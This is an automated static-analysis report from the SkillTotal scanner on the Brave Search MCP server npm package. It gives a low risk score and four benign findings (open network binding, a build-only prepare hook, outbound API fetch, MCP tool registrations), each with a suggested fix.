SkillTotal

Is Brave Search MCP server safe?

@brave/brave-search-mcp-server is an AI npm_package analyzed by SkillTotal's deterministic static scanner. The scan found no malicious indicators, though 4 risky constructs are reported for review. It can: install time execution, mcp tools detected and network egress — capabilities are what the code can do, not a verdict on intent. Risk score 10/100 (low).

@brave/brave-search-mcp-server 2.0.85

npm_package · https://github.com/brave/brave-search-mcp-server
LOW
10
/ 100 malicious-risk
Snapshot · scanned Jun 20, 2026 · @brave/brave-search-mcp-server@2.0.85 · engine 0.18.0 / ruleset 19
No malicious indicators - review capabilities before installing
Notable — review in context (capabilities are not malware):
  • Node.js network egress
  • npm prepare hook
  • Server bound to all network interfaces

No malicious indicators found by static analysis.

Capabilities — what this component can do (not a risk score):
install time executionmcp tools detectednetwork egress

Findings (4)

MEDIUMServer bound to all network interfacesST-EXPOSE-BIND

A server is bound to all network interfaces (0.0.0.0), not just your own machine.

src/config.ts:32-32 
host: '0.0.0.0',
src/config.ts:74-74 
process.env.BRAVE_MCP_HOST ?? '0.0.0.0'

Why it matters: Without authentication, other hosts on the network can reach it.

Fix: Bind to 127.0.0.1 for local-only use, or require authentication and restrict access if remote exposure is intended.

MEDIUMnpm prepare hookST-INSTALL-NPM-PREPARE

package.json has a 'prepare' script (runs on git/local installs and before publishing).

package.json:30-30 
"prepare": "npm run format && npm run build",

Why it matters: Usually a build step, but confirm it doesn't fetch or run remote code.

Fix: Usually a legitimate build step; confirm it only builds and does not fetch or execute remote code.

MEDIUMNode.js network egressST-NET-NODE

The component makes outbound network requests.

src/BraveAPI/index.ts:117-117 
const response = await fetch(urlWithParams, { headers });

Why it matters: Usually legitimate, but confirm the destinations are expected and no sensitive data leaves.

Fix: Confirm the destination hosts are expected and that no sensitive data is sent off-host.

LOWMCP tool surface detectedST-MCP-DETECTED

An MCP tool surface (manifest or tool definitions) was found.

server.json:1-1 
{
src/tools/images/index.ts:43-43 
mcpServer.registerTool(
src/tools/llm_context/index.ts:49-49 
mcpServer.registerTool(
src/tools/local/index.ts:77-77 
mcpServer.registerTool(
src/tools/news/index.ts:56-56 
mcpServer.registerTool(
src/tools/place_search/index.ts:54-54 
mcpServer.registerTool(
src/tools/summarizer/index.ts:71-71 
mcpServer.registerTool(
src/tools/videos/index.ts:41-41 
mcpServer.registerTool(
src/tools/web/index.ts:124-124 
mcpServer.registerTool(

Why it matters: Just context — review which tools it offers and their permissions.

Fix: Review the declared MCP tools and their permissions.

Check your own component

Run the same evidence-backed scan on any MCP server, agent skill, or package.

Scan your own component

Or get notified if this component's risk changes:

How we determine this: deterministic static analysis (regex + AST), evidence-anchored, no code execution. Methodology →